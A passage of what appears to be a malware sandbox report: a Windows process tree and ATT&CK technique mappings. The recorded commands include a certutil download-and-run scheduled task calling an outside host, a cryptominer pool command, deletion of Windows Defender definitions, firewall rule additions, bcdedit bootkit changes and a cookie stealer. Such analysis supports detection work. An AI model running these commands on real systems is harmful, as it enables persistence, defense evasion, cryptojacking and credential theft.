        "C:\ProgramData\Windows Host\Windows Host.exe"
        6⤵
        Executes dropped EXE
        
        PID:2052
    - - C:\ProgramData\8872028.97
        
        "C:\ProgramData\8872028.97"
        5⤵
        Executes dropped EXE
        
        PID:888
      - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 1016
        6⤵
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:2240
    - - C:\ProgramData\1319091.14
        
        "C:\ProgramData\1319091.14"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:1432
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      PID:1224
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        
        PID:1120
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2224
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:2652
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:2772

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:1444
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 56598120AD3CB2DF319946B7B651AAF4 C
  2⤵
  - Loads dropped DLL
  PID:1792

C:\Users\Admin\AppData\Local\Temp\98A7.exe
C:\Users\Admin\AppData\Local\Temp\98A7.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1108
- C:\Windows\SysWOW64\icacls.exe
  icacls "C:\Users\Admin\AppData\Local\e0628078-e601-4817-9fa0-8abd0342a450" /deny *S-1-1-0:(OI)(CI)(DE,DC)
  2⤵
  - Modifies file permissions
  PID:2036
- C:\Users\Admin\AppData\Local\Temp\98A7.exe
  "C:\Users\Admin\AppData\Local\Temp\98A7.exe" --Admin IsNotAutoStart IsNotTask
  2⤵
  - Executes dropped EXE
  PID:1612
- - C:\Users\Admin\AppData\Local\e9b292d1-c728-4a68-bc3f-2f709c66dd53\updatewin1.exe
    "C:\Users\Admin\AppData\Local\e9b292d1-c728-4a68-bc3f-2f709c66dd53\updatewin1.exe"
    3⤵
    - Executes dropped EXE
    PID:672
  - - C:\Users\Admin\AppData\Local\e9b292d1-c728-4a68-bc3f-2f709c66dd53\updatewin1.exe
      "C:\Users\Admin\AppData\Local\e9b292d1-c728-4a68-bc3f-2f709c66dd53\updatewin1.exe" --Admin
      4⤵
      Executes dropped EXE
      PID:2408
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
        5⤵
        
        PID:2776
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Admin\AppData\Local\script.ps1""' -Verb RunAs}"
        5⤵
        
        PID:2188
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\script.ps1
        6⤵
        
        PID:2216
    - - C:\Program Files\Windows Defender\mpcmdrun.exe
        
        "C:\Program Files\Windows Defender\mpcmdrun.exe" -removedefinitions -all
        5⤵
        Deletes Windows Defender Definitions
        
        PID:2560
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\delself.bat""
        5⤵
        
        PID:340
- - C:\Users\Admin\AppData\Local\e9b292d1-c728-4a68-bc3f-2f709c66dd53\updatewin2.exe
    "C:\Users\Admin\AppData\Local\e9b292d1-c728-4a68-bc3f-2f709c66dd53\updatewin2.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    PID:2800
- - C:\Users\Admin\AppData\Local\e9b292d1-c728-4a68-bc3f-2f709c66dd53\updatewin.exe
    "C:\Users\Admin\AppData\Local\e9b292d1-c728-4a68-bc3f-2f709c66dd53\updatewin.exe"
    3⤵
    - Executes dropped EXE
    PID:1268
  - - C:\Windows\SysWOW64\cmd.exe
      /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\e9b292d1-c728-4a68-bc3f-2f709c66dd53\updatewin.exe
      4⤵
      PID:1356
- - C:\Users\Admin\AppData\Local\e9b292d1-c728-4a68-bc3f-2f709c66dd53\5.exe
    "C:\Users\Admin\AppData\Local\e9b292d1-c728-4a68-bc3f-2f709c66dd53\5.exe"
    3⤵
    - Executes dropped EXE
    PID:2840
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\e9b292d1-c728-4a68-bc3f-2f709c66dd53\5.exe" & del C:\ProgramData\*.dll & exit
      4⤵
      PID:1092
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im 5.exe /f
        5⤵
        Kills process with taskkill
        
        PID:2148
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        5⤵
        Delays execution with timeout.exe
        
        PID:2404

C:\Users\Admin\AppData\Local\Temp\A40D.exe
C:\Users\Admin\AppData\Local\Temp\A40D.exe
1⤵
- Executes dropped EXE
PID:336
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo MFbR
  2⤵
  PID:1044
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cmd < Declinante.html
  2⤵
  PID:2436
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    PID:588
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^vbzKnQFSqnlAJtUxNfEmiqqLJfcsIqUhKbnAvosGDfELCESlYcgqhNQcvIqpchlqDWPjFzXEXXVRvfoyblzjLTqXHrtOiokftEiFOGFFnJrfSYZuAVMkUYgKWSECgobOMFMRoCdQFOOwQKtJrX$" Quel.cab
      4⤵
      PID:524
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 30
      4⤵
      Runs ping.exe
      PID:984
  - - C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
      Sui.com Benedetto.txt
      4⤵
      Executes dropped EXE
      PID:528
    - - C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
        
        C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com Benedetto.txt
        5⤵
        Executes dropped EXE
        
        PID:2576
      - C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
        
        C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
        6⤵
        Executes dropped EXE
        Checks processor information in registry
        
        PID:1096
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Sui.com /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:2348
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Sui.com /f
        8⤵
        Kills process with taskkill
        
        PID:1716
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:2848

C:\Users\Admin\AppData\Local\Temp\A90E.exe
C:\Users\Admin\AppData\Local\Temp\A90E.exe
1⤵
- Executes dropped EXE
PID:1628
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\nplvhkhe\
  2⤵
  PID:2796
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nvkobzii.exe" C:\Windows\SysWOW64\nplvhkhe\
  2⤵
  PID:2860
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create nplvhkhe binPath= "C:\Windows\SysWOW64\nplvhkhe\nvkobzii.exe /d\"C:\Users\Admin\AppData\Local\Temp\A90E.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:1668
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description nplvhkhe "wifi internet conection"
  2⤵
  PID:2560
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start nplvhkhe
  2⤵
  PID:896
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:460

C:\Users\Admin\AppData\Local\Temp\B9C1.exe
C:\Users\Admin\AppData\Local\Temp\B9C1.exe
1⤵
- Executes dropped EXE
PID:2404

C:\Users\Admin\AppData\Local\Temp\C0E3.exe
C:\Users\Admin\AppData\Local\Temp\C0E3.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1912
- C:\Users\Admin\AppData\Local\Temp\C0E3.exe
  C:\Users\Admin\AppData\Local\Temp\C0E3.exe
  2⤵
  PID:2920

C:\Windows\SysWOW64\timeout.exe
timeout /t 3
1⤵
- Delays execution with timeout.exe
PID:1600

C:\Windows\SysWOW64\nplvhkhe\nvkobzii.exe
C:\Windows\SysWOW64\nplvhkhe\nvkobzii.exe /d"C:\Users\Admin\AppData\Local\Temp\A90E.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3012
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  PID:2940
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k
    3⤵
    PID:2264

C:\Users\Admin\AppData\Local\Temp\D8F6.exe
C:\Users\Admin\AppData\Local\Temp\D8F6.exe
1⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2964
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  2⤵
  - Executes dropped EXE
  PID:2196
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  2⤵
  - Executes dropped EXE
  PID:2388
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  2⤵
  PID:4068

C:\Users\Admin\AppData\Local\Temp\F9D0.exe
C:\Users\Admin\AppData\Local\Temp\F9D0.exe
1⤵
- Executes dropped EXE
PID:1660
- C:\Users\Admin\AppData\Local\Temp\F9D0.exe
  "C:\Users\Admin\AppData\Local\Temp\F9D0.exe"
  2⤵
  - Executes dropped EXE
  - Windows security modification
  - Adds Run key to start application
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  PID:1468
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    PID:2344
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
      4⤵
      Modifies data under HKEY_USERS
      PID:1528
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe /15-15
    3⤵
    - Executes dropped EXE
    PID:816
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:2224
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
      4⤵
      Creates scheduled task(s)
      PID:3012
  - - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
      "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      4⤵
      PID:2788
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1304
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1420
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        5⤵
        Modifies boot configuration data using bcdedit
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:2952
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1456
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1936
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2480
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2704
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2848
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        5⤵
        Modifies boot configuration data using bcdedit
        Suspicious behavior: MapViewOfSection
        
        PID:2920
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2768
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2644
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        5⤵
        Modifies boot configuration data using bcdedit
        Suspicious use of SetThreadContext
        
        PID:2576
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2404
  - - C:\Windows\system32\bcdedit.exe
      C:\Windows\Sysnative\bcdedit.exe /v
      4⤵
      Modifies boot configuration data using bcdedit
      PID:2128
  - - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
      4⤵
      PID:3056
  - - C:\Windows\windefender.exe
      "C:\Windows\windefender.exe"
      4⤵
      PID:3060
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        5⤵
        
        PID:2928
      - C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        
        PID:1844
  - - C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
      4⤵
      PID:3268

C:\Users\Admin\AppData\Local\Temp\17FB.exe
C:\Users\Admin\AppData\Local\Temp\17FB.exe
1⤵
PID:2952

C:\Users\Admin\AppData\Local\Temp\2CA4.exe
C:\Users\Admin\AppData\Local\Temp\2CA4.exe
1⤵
- Executes dropped EXE
PID:1048
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /f /im chrome.exe
  2⤵
  PID:2564
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im chrome.exe
    3⤵
    - Kills process with taskkill
    PID:2608

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1711768642-641616141-1899226333655028190-23003426-21215504541163285537-1447630399"
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:2920

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-546944388-1801386389451887649-1960379915851133126367351191737503822348302665"
1⤵
PID:2560

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:1788

C:\Users\Admin\AppData\Local\Temp\4A72.tmp.exe
C:\Users\Admin\AppData\Local\Temp\4A72.tmp.exe
1⤵
PID:616

C:\Users\Admin\AppData\Local\Temp\53B6.tmp.exe
C:\Users\Admin\AppData\Local\Temp\53B6.tmp.exe
1⤵
PID:2428

C:\Windows\system32\taskeng.exe
taskeng.exe {13A37208-736A-43E4-858E-7094C0F74224} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]
1⤵
PID:2416
- C:\Users\Admin\AppData\Local\e0628078-e601-4817-9fa0-8abd0342a450\98A7.exe
  C:\Users\Admin\AppData\Local\e0628078-e601-4817-9fa0-8abd0342a450\98A7.exe --Task
  2⤵
  PID:2480
- C:\Users\Admin\AppData\Roaming\fhwivdj
  C:\Users\Admin\AppData\Roaming\fhwivdj
  2⤵
  PID:3992
- C:\Users\Admin\AppData\Roaming\twwivdj
  C:\Users\Admin\AppData\Roaming\twwivdj
  2⤵
  PID:4004
- C:\Users\Admin\AppData\Roaming\aiwivdj
  C:\Users\Admin\AppData\Roaming\aiwivdj
  2⤵
  PID:4016
- C:\Users\Admin\AppData\Roaming\avwivdj
  C:\Users\Admin\AppData\Roaming\avwivdj
  2⤵
  PID:4028
- C:\Users\Admin\AppData\Local\e0628078-e601-4817-9fa0-8abd0342a450\98A7.exe
  C:\Users\Admin\AppData\Local\e0628078-e601-4817-9fa0-8abd0342a450\98A7.exe --Task
  2⤵
  PID:952
- C:\Users\Admin\AppData\Roaming\fhwivdj
  C:\Users\Admin\AppData\Roaming\fhwivdj
  2⤵
  PID:3248
- C:\Users\Admin\AppData\Roaming\twwivdj
  C:\Users\Admin\AppData\Roaming\twwivdj
  2⤵
  PID:2436

C:\Users\Admin\AppData\Local\Temp\8E85.tmp.exe
C:\Users\Admin\AppData\Local\Temp\8E85.tmp.exe
1⤵
PID:1044

C:\Users\Admin\AppData\Local\Temp\9865.exe
C:\Users\Admin\AppData\Local\Temp\9865.exe
1⤵
PID:2848
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\6185.bat" "
  2⤵
  PID:2232

C:\Users\Admin\AppData\Local\Temp\A523.tmp.exe
C:\Users\Admin\AppData\Local\Temp\A523.tmp.exe
1⤵
PID:608

C:\Users\Admin\AppData\Local\Temp\B0D7.tmp.exe
C:\Users\Admin\AppData\Local\Temp\B0D7.tmp.exe
1⤵
PID:2188
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\B0D7.tmp.exe"
  2⤵
  PID:524
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:988

C:\Users\Admin\AppData\Local\Temp\C1F7.tmp.exe
C:\Users\Admin\AppData\Local\Temp\C1F7.tmp.exe
1⤵
PID:1376

C:\Users\Admin\AppData\Local\Temp\C7E2.exe
C:\Users\Admin\AppData\Local\Temp\C7E2.exe
1⤵
PID:2172
- C:\Users\Admin\AppData\Local\Temp\C7E2.exe
  "C:\Users\Admin\AppData\Local\Temp\C7E2.exe" --Admin IsNotAutoStart IsNotTask
  2⤵
  PID:2180
- - C:\Users\Admin\AppData\Local\d80ee7a9-57de-469a-abeb-6b28d493ddc2\5.exe
    "C:\Users\Admin\AppData\Local\d80ee7a9-57de-469a-abeb-6b28d493ddc2\5.exe"
    3⤵
    PID:2852
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\d80ee7a9-57de-469a-abeb-6b28d493ddc2\5.exe" & del C:\ProgramData\*.dll & exit
      4⤵
      PID:1912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im 5.exe /f
        5⤵
        Kills process with taskkill
        
        PID:528
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        5⤵
        Delays execution with timeout.exe
        
        PID:1620

C:\Users\Admin\AppData\Local\Temp\FAA6.exe
C:\Users\Admin\AppData\Local\Temp\FAA6.exe
1⤵
PID:2728

C:\Users\Admin\AppData\Local\Temp\63B.tmp.exe
C:\Users\Admin\AppData\Local\Temp\63B.tmp.exe
1⤵
PID:2372

C:\Users\Admin\AppData\Local\Temp\239B.tmp.exe
C:\Users\Admin\AppData\Local\Temp\239B.tmp.exe
1⤵
PID:2784
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout 1
  2⤵
  PID:812
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:1312
- C:\Users\Admin\AppData\Local\Temp\239B.tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\239B.tmp.exe"
  2⤵
  PID:1312
- C:\Users\Admin\AppData\Local\Temp\239B.tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\239B.tmp.exe"
  2⤵
  PID:2604
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 1616
  2⤵
  - Program crash
  PID:3088

C:\Users\Admin\AppData\Local\Temp\24C4.exe
C:\Users\Admin\AppData\Local\Temp\24C4.exe
1⤵
PID:2524

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2840

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2404

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:428

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1504

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2060

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2652

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2188

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2588

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2524

C:\Users\Admin\AppData\Local\Temp\2C63.exe
C:\Users\Admin\AppData\Local\Temp\2C63.exe
1⤵
PID:3384
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2C63.exe"
  2⤵
  PID:3708
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:3736

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3392

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3412

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3420

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3444

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3456

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3496

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3520

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3628

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3660

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Persistence

Bootkit

T1067

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

New Service

T1050

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery